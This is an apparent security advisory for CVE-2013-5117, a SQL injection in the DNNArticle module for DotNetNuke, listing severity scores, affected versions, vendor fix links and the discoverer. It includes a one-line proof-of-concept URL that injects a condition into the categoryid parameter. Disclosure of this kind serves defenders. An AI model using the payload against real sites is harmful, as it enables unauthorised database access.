7.5 High
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
6.5 Medium
AI Score
Confidence
Low
0.002 Low
EPSS
Percentile
59.2%
Title: DotNetNuke (DNNArticle Module) SQL Injection Vulnerability
References: CVE-2013-5117
Discovered by: Sajjad Pourali
Vendor http://www.zldnn.com/ , http://www.dnnarticle.com/β
Vendor advisory: http://www.zldnn.com/Support/tabid/643/ctl/RecordList/mid/1691/ItemID/2979/Default.aspx (Ticket iD:#2979)
Vendor contact: 2013-8-14
Solution: http://www.zldnn.com/Support/tabid/643/ctl/RecordList/mid/1691/ItemID/2979/Default.aspx (Ticket iD:#2979)
Remote: yes
Authentication required: no
User interaction required: no
Impact: High
Affected:
- DNNArticle 10.0 and earlier
---
PoC:
http://server/desktopmodules/dnnarticle/dnnarticlerss.aspx?moduleid=0&categoryid=1+or+1=@@version
---
+ Sajjad Pourali
+ http://www.securation.com/
+ http://www.cert.um.ac.ir/
+ Contact: sajjad[at]securation.com